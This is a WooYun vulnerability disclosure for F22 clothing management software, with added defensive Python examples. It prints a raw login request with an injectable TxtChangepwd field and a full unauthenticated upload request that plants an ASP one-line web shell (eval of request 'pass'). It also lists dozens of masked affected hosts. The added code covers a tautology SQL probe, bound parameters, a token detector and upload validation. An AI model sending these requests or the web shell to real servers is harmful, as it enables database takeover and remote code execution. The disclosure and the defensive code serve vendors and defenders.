WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-09-16: Details reported to the vendor, awaiting vendor handling
2015-09-18: Vendor confirmed; details disclosed to the vendor only
2015-09-21: Details opened to third-party security partners
2015-11-12: Details disclosed to core white hats and relevant domain experts
2015-11-22: Details disclosed to ordinary white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public
As the title says.
F22 clothing management software: one SQL injection point, no login required, DBA privileges
POST / HTTP/1.1
Host: **.**.**.**:8888
Content-Length: 694
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8

__VIEWSTATE=%2FwEPDwUKLTU3MzU4MDE3Mw9kFgICAw9kFggCAQ8QZA8WAWYWARAFDOiHquWKqOivhuWIqwUM6Ieq5Yqo6K%2BG5YirZ2RkAgMPD2QWAh4Jb25rZXlkb3duBSByZXR1cm4ganVtcE5leHQuY2FsbCh0aGlzLGV2ZW50KWQCBQ8PZBYCHwAFIHJldHVybiBqdW1wTmV4dC5jYWxsKHRoaXMsZXZlbnQpZAIHDw9kFgIfAAUgcmV0dXJuIGp1bXBOZXh0LmNhbGwodGhpcyxldmVudClkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQRidG9r6WptDiQ9vTtaZjd4ZBA27uBZCx6p87oJHjFH%2Bx5fNw4%3D&__VIEWSTATEGENERATOR=999D6048&__EVENTVALIDATION=%2FwEWBwKqporlCQKT1cKmBAK0ysq%2BAgKm5IyfBwKg1t%2FLAQKti6zYCwKT%2Bp7DBwT6LFeQC9UjEiRuKZAEw6JtUHGK8lEZhG8XHZbtjTkq&DDList=%E8%87%AA%E5%8A%A8%E8%AF%86%E5%88%AB&TxtChangepwd=123456&tbuser=123456&tbpwd=123456&btok.x=40&btok.y=17&ServerDate=2015-09-06
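The request above is the login form post, and the report names TxtChangepwd as the injectable field: whatever is typed into it reaches the database query as SQL text. The following is an added example, not code from the report or from the F22 product, that reproduces the defect class against a constructed in-memory SQLite table and shows why binding parameters closes it. It also includes a small token scanner for the "filter submitted parameters" advice; the table contents, account names and the token list are assumptions made for the demo.

```python
import re
import sqlite3

# Constructed sample accounts for the demo; not data from the report.
SAMPLE_USERS = [("admin", "s3cret"), ("clerk", "pass1")]


def make_db():
    """Return an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """Build the statement by string formatting, so field contents become SQL.

    This is the same defect class as a login field that reaches the query
    unescaped; it is kept only to contrast with login_fixed below.
    """
    sql = "SELECT name FROM users WHERE name = '%s' AND pwd = '%s'" % (user, pwd)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, user, pwd):
    """Same query with bound parameters: field contents are data, never SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND pwd = ?"
    row = conn.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


# SQL metacharacters and keywords worth logging when they show up in a login
# or password-change field. This is a detection aid for the report's "filter
# submitted parameters" advice, not a replacement for bound parameters.
_SQL_TOKENS = re.compile(
    r"(--|/\*|\*/|;|'|\"|\bor\b|\band\b|\bunion\b|\bselect\b|\bwaitfor\b|\bxp_\w+)",
    re.IGNORECASE,
)


def suspicious_sql_tokens(value):
    """Return the distinct SQL tokens found in a submitted field, lower-cased."""
    return sorted(set(m.lower() for m in _SQL_TOKENS.findall(value)))


if __name__ == "__main__":
    conn = make_db()
    probe = "' OR '1'='1"  # classic tautology used to show the contrast
    print("vulnerable:", login_vulnerable(conn, "nobody", probe))  # admin
    print("fixed:     ", login_fixed(conn, "nobody", probe))       # None
    print("tokens:    ", suspicious_sql_tokens(probe))
```

With the formatted query, the tautology makes the WHERE clause true for every row and the first account is returned; with bound parameters the same text is compared as a literal password and no row matches. The token scanner is useful for alerting on the login endpoint, but an allow-list on the field (for a numeric password-change flag, digits only) is the stronger input-side control.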
The TxtChangepwd parameter in the login form is injectable (for each system in the cases below, re-capture the request before running the injection).
One unrestricted GETSHELL, no login required:
/cutesoft_client/uploadfile.aspx
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: **.**.**.**:8888
Content-Length: 664
Origin: http://**.**.**.**:8888
X-Requested-With: ShockwaveFlash/**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Accept: */*
Referer: http://**.**.**.**:8888/cutesoft_client/uploadfile.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8

------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="Filename"

1.asp.jgp
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="fileext"

*.jpg;*.gif;*.png;*.jpeg
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="folder"

/oa/file/news
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="Filedata"; filename="1.asp"
Content-Type: application/octet-stream

<%eval request("pass")%>
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="Upload"

Submit Query
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6--
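Two things stand out in the upload request above: the handler accepts it without any session, and the accepted extension list ("fileext") and the target folder are supplied by the client, so a "1.asp" file lands in a web-served directory. The following is an added example, not code from the report, from the F22 product or from the CuteSoft editor, showing the server-side checks that close this class of issue (authentication, a server-owned allow-list, rejection of any executable segment in the name, magic-byte check, server-chosen stored name) plus a detection pass over constructed access-log lines that finds script files served from the upload folder. The extension sets, the log format and the sample lines are assumptions made for the demo; only the "/oa/file/news" folder and the handler path come from the captured request.

```python
import os
import re
import secrets

# Server-side allow-list. The client-supplied "fileext" field in the captured
# request is never consulted: the client must not choose what is accepted.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Extensions IIS/ASP.NET hands to a script engine or that change server
# behaviour (assumed list). Any of these anywhere in the name, e.g.
# "1.asp.jpg", is rejected, not just the last segment.
EXECUTABLE_EXTENSIONS = {"asp", "aspx", "ashx", "asmx", "asa", "asax",
                         "cer", "cdx", "config", "soap", "svc"}

# Leading bytes (magic numbers) of the formats in the allow-list.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, data, authenticated):
    """Return (accepted, reason_or_stored_name) for one uploaded file."""
    if not authenticated:
        return False, "unauthenticated upload rejected"
    # Strip any client-supplied directory component before looking at the name.
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing or empty extension"
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False, "executable extension in file name"
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not in allow-list"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    # The server picks the stored name; nothing from the client survives.
    return True, secrets.token_hex(16) + "." + ext


# Constructed access-log lines (date time method path status), loosely modelled
# on a W3C-style log; not log data from the report.
SAMPLE_LOG = """\
2015-09-06 10:00:01 POST /CuteSoft_Client/UploadHandler.ashx 200
2015-09-06 10:00:03 GET /oa/file/news/1.asp 200
2015-09-06 10:00:05 GET /oa/file/news/logo.png 200
2015-09-06 10:00:07 GET /oa/file/news/old.asp 404
"""

_LOG_RE = re.compile(r"^\S+ \S+ (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$")


def executed_files_in_upload_dirs(log_text, upload_dirs=("/oa/file/",)):
    """Return paths under an upload directory that carry an executable
    extension and were actually served (2xx). One hit merits an incident."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        under_upload = any(path.lower().startswith(d) for d in upload_dirs)
        if under_upload and ext in EXECUTABLE_EXTENSIONS and m.group("status").startswith("2"):
            hits.append(path)
    return hits


if __name__ == "__main__":
    jpeg_head = b"\xff\xd8\xff\xe0" + b"\x00" * 12   # constructed JPEG prefix
    print(validate_upload("photo.jpg", jpeg_head, True))
    print(validate_upload("1.asp", b"<% script %>", True))
    print(validate_upload("1.asp.jgp", jpeg_head, True))
    print(executed_files_in_upload_dirs(SAMPLE_LOG))
```

Beyond the checks in code, the upload folder itself should be configured so the web server never executes anything in it (no script handler mapping, or a handler mapping that serves everything as static content); the log scan is the compensating detection for the case where that configuration is missed.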
Cases:
**.**.**.**:8000/**.**.**.**:8888/**.**.**.**:8080/**.**.**.**:8888/**.**.**.**/http://**.**.**.**/**.**.**.**/**.**.**.**/http://**.**.**.**:8088/**.**.**.**/**.**.**.**:8080/**.**.**.**:8888/http://**.**.**.**/**.**.**.**:81/**.**.**.**:81/**.**.**.**/**.**.**.**:8000/**.**.**.**/**.**.**.**:8888/http://**.**.**.**/**.**.**.**:8000/**.**.**.**/http://**.**.**.**:8081/**.**.**.**:81/http://**.**.**.**/**.**.**.**:81/**.**.**.**/**.**.**.**:8888/**.**.**.**:8081/**.**.**.**:8086/**.**.**.**:8081/**.**.**.**:8081/http://**.**.**.**:8081/**.**.**.**:8081/http://**.**.**.**:8088/**.**.**.**:8888/**.**.**.**:8088/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8080/**.**.**.**:88/**.**.**.**:88/**.**.**.**:81/**.**.**.**:81/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/http://**.**.**.**:8888/http://**.**.**.**:88/**.**.**.**:8081/http://**.**.**.**:88/
For the SQL injection, filter the submitted parameters; for the getshell issue, add access control to restrict access.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-09-18 13:58
No direct handling channel with the software vendor has been established yet; awaiting claim.
None yet